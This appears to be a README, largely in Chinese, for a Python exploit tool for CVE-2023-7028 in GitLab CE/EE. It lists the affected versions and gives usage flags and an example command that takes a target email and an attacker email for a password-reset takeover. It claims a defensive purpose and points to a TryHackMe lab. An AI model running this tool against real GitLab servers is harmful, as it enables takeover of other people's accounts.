
Exploit for CVE-2023-7028 - GitLab CE/EE
⚠️ 此漏洞利用工具仅供防御用途,应由网络安全专业人员用于识别可能存在漏洞的 GitLab 服务器。
受影响的产品和版本:
| 产品 | 受影响版本 |
|---|---|
| GitLab 社区版和企业版 | < 16.1.6 < 16.2.9 < 16.3.7 < 16.4.5 < 16.5.6 < 16.6.4 < 16.7.2 |
usage: CVE-2023-7028.py [-h] -u URL -t TARGET -a ATTACKER
options:
-h, --help show this help message and exit
-u URL, --url URL GitLab URL (HTTP or HTTPS)
-t TARGET, --target TARGET
Target email address
-a ATTACKER, --attacker ATTACKER
Attacker email address
示例: python CVE-2023-7028.py -u https://gitlab.example.com -t [email protected] -a [email protected]
你可以使用 Try Hack Me 的实验室房间 GitLab CVE-2023-7028 来测试此漏洞利用工具,因为它运行着受 CVE-2023-7028 影响的漏洞版本。
